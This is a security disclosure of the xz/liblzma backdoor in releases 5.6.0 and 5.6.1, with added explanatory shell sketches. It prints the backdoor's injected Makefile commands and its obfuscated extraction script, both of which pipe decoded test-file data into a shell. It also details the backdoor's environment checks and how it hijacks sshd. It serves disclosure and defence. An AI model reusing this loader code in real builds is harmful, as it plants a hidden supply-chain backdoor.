Backdoor in upstream xz/liblzma leading to SSH server compromise

Original link: https://www.openwall.com/lists/oss-security/2024/03/29/4

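Summary: In March 2024, Andres Freund discovered a backdoor in the upstream xz repository and release tarballs, affecting liblzma (part of the xz package). It affects Linux distributions whose sshd ends up loading a backdoored liblzma, which happens on Debian and several others because they patch openssh to support systemd notification and libsystemd depends on liblzma. After noticing ssh logins taking a lot of CPU and valgrind errors, Freund traced the cause to the 5.6.0 and 5.6.1 release tarballs: a script injected at the end of configure modifies the liblzma Makefile at build time so that code hidden in test files ends up in the library. At runtime that code installs an audit hook in the dynamic linker and redirects RSA_public_decrypt to its own code, so it runs during SSH public key authentication, before the user is authenticated, and likely allows unauthorized access or remote code execution. Red Hat assigned the issue CVE-2024-3094. Users are strongly advised to upgrade affected systems promptly.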


oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise

Date: Fri, 29 Mar 2024 08:51:26 -0700
From: Andres Freund <[email protected]>
To: [email protected]
Subject: backdoor in upstream xz/liblzma leading to ssh server compromise

Hi,

After observing a few odd symptoms around liblzma (part of the xz package) on
Debian sid installations over the last weeks (logins with ssh taking a lot of
CPU, valgrind errors) I figured out the answer:

The upstream xz repository and the xz tarballs have been backdoored.

At first I thought this was a compromise of debian's package, but it turns out
to be upstream.

== Compromised Release Tarball ==

One portion of the backdoor is *solely in the distributed tarballs*. For
easier reference, here's a link to debian's import of the tarball, but it is
also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is *not* in the upstream source of build-to-host, nor is
build-to-host used by xz in git.  However, it is present in the tarballs
released upstream, except for the "source code" links, which I think github
generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0
https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and uses data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies
$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

After de-obfuscation this leads to the attached injected.txt.
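
The two extraction stages above rely on three small shell idioms: a character
swap with tr, a repeating skip/keep pattern built from chained head -c calls,
and a byte permutation written as tr ranges. The following is a minimal sketch
of each on made-up data. The function names, the sample strings and the tiny
chunk sizes (3 and 5 instead of 1024 and 2048) are illustrative assumptions,
not values from the backdoor, and the chained head calls assume GNU head,
which reads no more than the requested byte count from a pipe.

```shell
# 1) Stage-1 style swap: tab<->space and '-'<->'_' (same tr sets as above).
#    Because it is a pure swap, applying it twice restores the input.
swap() { tr "\t \-_" " \t_\-"; }
printf 'a-b_c\n' | swap          # prints a_b-c
printf 'a-b_c\n' | swap | swap   # prints a-b_c

# 2) Stage-2 style carving: discard 3 bytes, keep 5, three times over.
#    Each head consumes its share of the shared pipe and leaves the rest.
carve() {
  (head -c 3 >/dev/null) && head -c 5 &&
  (head -c 3 >/dev/null) && head -c 5 &&
  (head -c 3 >/dev/null) && head -c 5
}
printf '###hello###, wor###ld!!!' | carve; echo   # prints hello, world!!!

# 3) Byte permutation: ranges listed in the first set map, position by
#    position, onto the second set. Here that is a 13-letter rotation.
unscramble() { tr 'n-za-m' 'a-z'; }
printf 'uryyb\n' | unscramble    # prints hello
```

In the real pipeline the same three steps operate on the decompressed contents
of the test files rather than on readable text.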

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in
  tests/files/bad-3-corrupt_lzma2.xz
  tests/files/good-large_compressed.lzma
committed upstream. They were initially added in
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors
and crashes in some configurations, due to the stack layout differing from what
the backdoor was expecting.  An attempt was made to work around these issues
in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their
system. Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the "fixes" mentioned above.

Florian Weimer first extracted the injected code in isolation (also attached,
liblzma_la-crc64-fast.o); I had only looked at the whole binary. Thanks!

== Affected Systems ==

The attached de-obfuscated script is invoked first after configure, where it
decides whether to modify the build process to inject the code.

These conditions include targeting only x86-64 linux:
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Building with gcc and the gnu linker
    if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
    exit 0
    fi
    if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
    exit 0
    fi
    LDv=$LD" -v"
    if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
    exit 0

Running as part of a debian or RPM package build:
    if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

Particularly the latter is likely aimed at making it harder to reproduce the
issue for investigators.
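
To see how the first quoted condition behaves, the sketch below wraps it in a
hypothetical function, classify_build, and evaluates it for a few sample build
triples. It assumes that the body of that "if" is "exit 0", as in the other
checks quoted above; the function name and the sample triples are
illustrative only.

```shell
# Hypothetical wrapper around the architecture condition quoted above.
# Assumption: when the condition is true, the script exits without
# modifying the build.
classify_build() {
  build=$1
  if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then
    echo "exit"
  else
    echo "continue"
  fi
}

classify_build x86_64-pc-linux-gnu        # prints continue
classify_build aarch64-unknown-linux-gnu  # prints exit
classify_build aarch64-apple-darwin       # prints continue
```

Note that "!" applies only to the first subshell, so the test reads as "not
x86_64 and linux-gnu". A triple that is neither falls through to the later
gcc, GNU ld and packaging checks rather than exiting here.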

Due to the working of the injected code (see below), it is likely the backdoor
can only work on glibc based systems.

Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by linux
distributions, and where they have, mostly in pre-release versions.
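
As a coarse first check, the installed version can be compared against the two
releases named above. This is only a sketch: the function name is
hypothetical, it assumes "xz --version" prints a line of the form
"liblzma X.Y.Z", and a matching version alone does not prove the injected code
was built in, since that depends on the build conditions described earlier.

```shell
# Succeeds if the given version string is one of the two releases
# named in this report.
is_backdoored_release() {
  case $1 in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

# Assumption: xz --version prints a "liblzma X.Y.Z" line.
if command -v xz >/dev/null 2>&1; then
  v=$(xz --version | awk '/^liblzma/ { print $2 }')
  if is_backdoored_release "$v"; then
    echo "liblzma $v: release named in this report"
  else
    echo "liblzma $v: not 5.6.0 or 5.6.1"
  fi
fi
```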

== Observing Impact on openssh server ==

With the backdoored liblzma installed, logins via ssh become a lot slower.

time ssh [email protected]

before:
[email protected]: Permission denied (publickey).

real	0m0.299s
user	0m0.202s
sys	0m0.006s

after:
[email protected]: Permission denied (publickey).

real	0m0.807s
user	0m0.202s
sys	0m0.006s

openssh does not directly use liblzma. However debian and several other
distributions patch openssh to support systemd notification, and libsystemd
does depend on lzma.
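
Whether a given sshd actually pulls in liblzma through this indirect
dependency can be checked from its ldd output. The following is a minimal
sketch, not the attached detection script: the helper name liblzma_path is
hypothetical, and the sshd path is the one used in this report and may differ
on other systems.

```shell
# Reads ldd output on stdin and prints the resolved path of liblzma, if any.
liblzma_path() {
  awk '/liblzma/ { print $3; exit }'
}

sshd_bin=/usr/sbin/sshd   # path taken from this report; may differ elsewhere
if [ -x "$sshd_bin" ] && command -v ldd >/dev/null 2>&1; then
  path=$(ldd "$sshd_bin" | liblzma_path)
  if [ -n "$path" ]; then
    echo "sshd loads liblzma from $path"
  else
    echo "sshd does not appear to load liblzma"
  fi
fi
```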

Initially starting sshd outside of systemd did not show the slowdown, despite
the backdoor briefly getting invoked. This appears to be part of some
countermeasures to make analysis harder.

Observed requirements for the exploit:
a) TERM environment variable is not set
b) argv[0] needs to be /usr/sbin/sshd
c) LD_DEBUG, LD_PROFILE are not set
d) LANG needs to be set
e) Some debugging environments, like rr, appear to be detected. Plain gdb
   appears to be detected in some situations, but not others

To reproduce outside of systemd, the server can be started with a clear
environment, setting only the required variable:

env -i LANG=en_US.UTF-8 /usr/sbin/sshd -D
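
The observed requirements (a) through (d) above can be restated as a small
predicate over argv[0] and a list of NAME=VALUE environment entries. This is
only a model of the observations, with a hypothetical function name; it does
not cover (e), and the backdoor may well perform further checks.

```shell
# Succeeds if argv[0] and the given environment entries satisfy the
# observed requirements (a)-(d). Usage: preconditions_met ARGV0 [NAME=VALUE...]
preconditions_met() {
  argv0=$1
  shift
  [ "$argv0" = /usr/sbin/sshd ] || return 1        # (b)
  has_lang=no
  for kv in "$@"; do
    case $kv in
      TERM=*|LD_DEBUG=*|LD_PROFILE=*) return 1 ;;  # (a), (c)
      LANG=*) has_lang=yes ;;                      # (d)
    esac
  done
  [ "$has_lang" = yes ]
}

preconditions_met /usr/sbin/sshd LANG=en_US.UTF-8 && echo "would proceed"
preconditions_met /usr/sbin/sshd LANG=C TERM=foo || echo "would bail out"
```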

In fact, openssh does not need to be started as a server to observe the
slowdown:

slow:
env -i LANG=C /usr/sbin/sshd -h

(about 0.5s on my older system)

fast:
env -i LANG=C TERM=foo /usr/sbin/sshd -h
env -i LANG=C LD_DEBUG=statistics /usr/sbin/sshd -h
...

(about 0.01s on the same system)
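
The slow and fast cases can be compared side by side with a small timing
helper. This is a sketch under assumptions: elapsed_ms is a hypothetical name,
it relies on GNU date's %N (nanoseconds) format, and the absolute numbers will
vary by machine.

```shell
# Prints the wall-clock time of a command in milliseconds.
# Assumption: GNU date, whose %N format yields nanoseconds.
elapsed_ms() {
  start=$(date +%s%N)
  "$@" >/dev/null 2>&1 || true   # the exit status is irrelevant for timing
  end=$(date +%s%N)
  echo $(( (end - start) / 1000000 ))
}

if [ -x /usr/sbin/sshd ]; then
  echo "TERM unset: $(elapsed_ms env -i LANG=C /usr/sbin/sshd -h) ms"
  echo "TERM set:   $(elapsed_ms env -i LANG=C TERM=foo /usr/sbin/sshd -h) ms"
fi
```

A large gap between the two lines would match the slowdown described above; a
small gap does not by itself rule anything out.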

It's possible that an argv[0] other than /usr/sbin/sshd would also have an
effect - there are obviously lots of servers linking to libsystemd.

== Analyzing the injected code ==

I am *not* a security researcher, nor a reverse engineer.  There's lots of
stuff I have not analyzed and most of what I describe comes purely from
observation rather than from exhaustively analyzing the backdoor code.

To analyze I primarily used "perf record -e intel_pt//ub" to observe where
execution diverges between the backdoor being active and not. Then also gdb,
setting breakpoints before the divergence.

The backdoor initially intercepts execution by replacing the ifunc resolvers
crc32_resolve(), crc64_resolve() with different code, which calls
_get_cpuid(), injected into the code (which previously would just be static
inline functions).  In xz 5.6.1 the backdoor was further obfuscated, removing
symbol names.

These functions get resolved during startup, because sshd is built with
-Wl,-z,now, leading to all symbols being resolved early. If started with
LD_BIND_NOT=1 the backdoor does not appear to work.
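
Whether a binary was linked with -z now can be read from its dynamic section.
The sketch below assumes binutils' readelf is available and that immediate
binding shows up as BIND_NOW in the FLAGS entry or NOW in FLAGS_1; the helper
name has_bind_now is hypothetical.

```shell
# Reads `readelf -d` output on stdin; succeeds if the dynamic section
# requests immediate binding (what -Wl,-z,now produces).
has_bind_now() {
  grep -Eq 'BIND_NOW|FLAGS_1.*NOW'
}

if [ -x /usr/sbin/sshd ] && command -v readelf >/dev/null 2>&1; then
  if readelf -d /usr/sbin/sshd | has_bind_now; then
    echo "sshd: immediate binding, symbols resolved at startup"
  else
    echo "sshd: lazy binding"
  fi
fi
```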

When called from crc32_resolve(), _get_cpuid() does not do much: it just sees
that a 'completed' variable is 0 and increments it, returning the normal cpuid
result (via a new _cpuid()). It gets more interesting during crc64_resolve().

In the second invocation crc64_resolve() appears to find various information,
like data from the dynamic linker, program arguments and environment. Then it
performs various environment checks, including those above. There are other
checks I have not fully traced.

If the above decides to continue, the code appears to be parsing the symbol
tables in memory. This is the quite slow step that made me look into the issue.

Notably liblzma's symbols are resolved before many of the other libraries,
including the symbols in the main sshd binary.  This is important because once
symbols are resolved, the GOT gets remapped read-only thanks to -Wl,-z,relro.

To be able to resolve symbols in libraries that have not yet loaded, the
backdoor installs an audit hook into the dynamic linker, which can be observed
with gdb using
  watch _rtld_global_ro._dl_naudit
It looks like the audit hook is only installed for the main binary.

That hook gets called, from _dl_audit_symbind, for numerous symbols in the
main binary. It appears to wait for "RSA_public_decrypt@....plt" to be
resolved.  When called for that symbol, the backdoor changes the value of
RSA_public_decrypt@....plt to point to its own code.  It does not do this via
the audit hook mechanism, but outside of it.

For reasons I do not yet understand, it does change sym.st_value *and* the
return value from the audit hook to a different value, which leads
_dl_audit_symbind() to do nothing - why change anything at all then?

After that the audit hook is uninstalled again.

It is possible to change the got.plt contents at this stage because it has not
(and can't yet) been remapped to be read-only.

I suspect there might be further changes performed at this stage.

== Impact on sshd ==

The prior section explains that RSA_public_decrypt@....plt was redirected to
point into the backdoor code. The trace I was analyzing indeed shows that
during a pubkey login the exploit code is invoked:

            sshd 1736357 [010] 714318.734008:          1  branches:uH:      5555555ded8c ssh_rsa_verify+0x49c (/usr/sbin/sshd) =>     5555555612d0 RSA_public_decrypt@...+0x0 (/usr/sbin/sshd)

The backdoor then calls back into libcrypto, presumably to perform normal authentication:

            sshd 1736357 [010] 714318.734009:          1  branches:uH:      7ffff7c137cd [unknown] (/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0) =>     7ffff792a2b0 RSA_get0_key+0x0 (/usr/lib/x86_64-linux-gnu/libcrypto.so.3)

I have not yet analyzed precisely what is being checked for in the injected
code, to allow unauthorized access. Since this is running in a
pre-authentication context, it seems likely to allow some form of access or
other form of remote code execution.

I'd upgrade any potentially vulnerable system ASAP.

== Bug reports ==

Given the apparent upstream involvement I have not reported an upstream
bug. As I initially thought it was a debian specific issue, I sent a more
preliminary report to [email protected].  Subsequently I reported the issue
to distros@. CISA was notified by a distribution.

Red Hat assigned this issue CVE-2024-3094.

== Detecting if installation is vulnerable ==

Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a
system is vulnerable, attached here. Thanks!

Greetings,

Andres Freund

View attachment "injected.txt" of type "text/plain" (8236 bytes)

Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)

Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
